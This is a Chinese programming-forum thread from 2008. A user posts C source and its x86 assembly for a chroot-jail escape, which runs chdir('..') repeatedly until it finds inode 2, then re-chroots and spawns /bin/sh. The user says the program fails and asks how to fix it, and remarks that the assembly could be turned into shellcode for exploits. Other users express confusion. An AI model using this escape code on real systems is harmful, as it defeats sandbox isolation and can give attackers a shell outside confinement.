免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 程序设计 C/C++ 让我失望的程序,我该怎么修改?
12下一页
最近访问板块 发新帖
查看: 3128 | 回复: 14
打印 上一主题 下一主题

让我失望的程序,我该怎么修改? [复制链接]

c_acceleration

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-05-11 23:29 |只看该作者 |倒序浏览
#include "string.h"
#include <sys/types.h>
#include <sys/stat.h>

#include <unistd.h>


int    main()
{
    int    i;
    struct stat sb;
    mkdir("A", 0755);
    chroot("A");
    for(i = 0; i < 1024; i ++){
        puts("HERE");
        memset(&sb, 0, sizeof(sb));
        chdir("..");
        stat(".", &sb);   
        if(sb.st_ino == 2){
            chroot(".");
            system("/bin/sh");
            exit(0);
        }
    }
    puts("failure");
    return 0;
}


让我失望了chroot jail....
man 2 stat查相关stat.

.globl main
&nbsp;&nbsp;&nbsp;&nbsp;.type&nbsp;&nbsp;&nbsp;&nbsp;main, @function
main:
&nbsp;&nbsp;&nbsp;&nbsp;leal&nbsp;&nbsp;&nbsp;&nbsp;4(%esp), %ecx
&nbsp;&nbsp;&nbsp;&nbsp;andl&nbsp;&nbsp;&nbsp;&nbsp;$-16, %esp
&nbsp;&nbsp;&nbsp;&nbsp;pushl&nbsp;&nbsp;&nbsp;&nbsp;-4(%ecx)
&nbsp;&nbsp;&nbsp;&nbsp;pushl&nbsp;&nbsp;&nbsp;&nbsp;%ebp
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;%esp, %ebp
&nbsp;&nbsp;&nbsp;&nbsp;pushl&nbsp;&nbsp;&nbsp;&nbsp;%ecx
&nbsp;&nbsp;&nbsp;&nbsp;subl&nbsp;&nbsp;&nbsp;&nbsp;$116, %esp
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$493, 4(%esp)
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$.LC0, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;mkdir
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$.LC0, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;chroot
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$0, -8(%ebp)
&nbsp;&nbsp;&nbsp;&nbsp;jmp&nbsp;&nbsp;&nbsp;&nbsp;.L2
.L3:
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$.LC1, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;puts
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$88, 8(%esp)
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$0, 4(%esp)
&nbsp;&nbsp;&nbsp;&nbsp;leal&nbsp;&nbsp;&nbsp;&nbsp;-96(%ebp), %eax
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;%eax, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;memset
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$.LC2, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;chdir
&nbsp;&nbsp;&nbsp;&nbsp;leal&nbsp;&nbsp;&nbsp;&nbsp;-96(%ebp), %eax
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;%eax, 4(%esp)
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$.LC3, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;stat
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;-84(%ebp), %eax
&nbsp;&nbsp;&nbsp;&nbsp;cmpl&nbsp;&nbsp;&nbsp;&nbsp;$2, %eax
&nbsp;&nbsp;&nbsp;&nbsp;jne&nbsp;&nbsp;&nbsp;&nbsp;.L4
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$.LC3, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;chroot
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$.LC4, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;system
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$0, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;exit
.L4:
&nbsp;&nbsp;&nbsp;&nbsp;addl&nbsp;&nbsp;&nbsp;&nbsp;$1, -8(%ebp)
.L2:
&nbsp;&nbsp;&nbsp;&nbsp;cmpl&nbsp;&nbsp;&nbsp;&nbsp;$1023, -8(%ebp)
&nbsp;&nbsp;&nbsp;&nbsp;jle&nbsp;&nbsp;&nbsp;&nbsp;.L3
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$.LC5, (%esp)
&nbsp;&nbsp;&nbsp;&nbsp;call&nbsp;&nbsp;&nbsp;&nbsp;puts
&nbsp;&nbsp;&nbsp;&nbsp;movl&nbsp;&nbsp;&nbsp;&nbsp;$0, %eax
&nbsp;&nbsp;&nbsp;&nbsp;addl&nbsp;&nbsp;&nbsp;&nbsp;$116, %esp
&nbsp;&nbsp;&nbsp;&nbsp;popl&nbsp;&nbsp;&nbsp;&nbsp;%ecx
&nbsp;&nbsp;&nbsp;&nbsp;popl&nbsp;&nbsp;&nbsp;&nbsp;%ebp
&nbsp;&nbsp;&nbsp;&nbsp;leal&nbsp;&nbsp;&nbsp;&nbsp;-4(%ecx), %esp
&nbsp;&nbsp;&nbsp;&nbsp;ret


对了,如果把汇编转化为字节码,就可以exploit使用了

[ 本帖最后由 c_acceleration 于 2008-5-11 23:37 编辑 ]
cjaizss

论坛徽章:
3
2015年迎新春徽章 日期:2015-03-04 09:56:11数据库技术版块每日发帖之星 日期:2016-08-03 06:20:00数据库技术版块每日发帖之星 日期:2016-08-04 06:20:00
2 [报告]
发表于 2008-05-12 00:24 |只看该作者
看了你的程序,没看懂你想干什么
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
tianjiao85

论坛徽章:
0
3 [报告]
发表于 2008-05-12 08:06 |只看该作者
也看不懂
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
c_acceleration

论坛徽章:
0
4 [报告]
发表于 2008-05-12 10:17 |只看该作者

回复 #2 cjaizss 的帖子

http://blog.csdn.net/zhoujunyi/archive/2007/04/14/1564607.aspx
看这篇文章,就知道了
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
cjaizss

论坛徽章:
3
2015年迎新春徽章 日期:2015-03-04 09:56:11数据库技术版块每日发帖之星 日期:2016-08-03 06:20:00数据库技术版块每日发帖之星 日期:2016-08-04 06:20:00
5 [报告]
发表于 2008-05-12 10:32 |只看该作者
你都已经chroot到A目录了,还能chroot回去?
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
c_acceleration

论坛徽章:
0
6 [报告]
发表于 2008-05-12 10:39 |只看该作者
我就是想摆脱chroot jail限制。首先在chroot jail内创建一个目录,接着chroot到该目录上。然后迭代转换到目录"../"下,循环1024次。在每一次迭代都在当前目录执行stat(),如果该目录由inode 2就再chroot到./一次,然后执行shell
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
c_acceleration

论坛徽章:
0
7 [报告]
发表于 2008-05-12 10:42 |只看该作者
对了,有人有gtk的类似终端的窗口模板么?我没学过gtk,核心的程序代码写好,我想要个图形界面
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
flw

论坛徽章:
1
2015年辞旧岁徽章 日期:2015-03-03 16:54:15
8 [报告]
发表于 2008-05-12 11:13 |只看该作者
楼主该不会是来灌水、逗大家玩的吧?
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
c_acceleration

论坛徽章:
0
9 [报告]
发表于 2008-05-12 11:15 |只看该作者
原帖由 flw 于 2008-5-12 11:13 发表
楼主该不会又是来灌水、逗大家玩的吧?


干吗用又,还加亮,没那么无聊。。。
说真的,该怎么突破呢,这个程序怎么实现不了?
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
doctorjxd

论坛徽章:
0
10 [报告]
发表于 2008-05-12 12:17 |只看该作者
楼主在藐视chroot
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP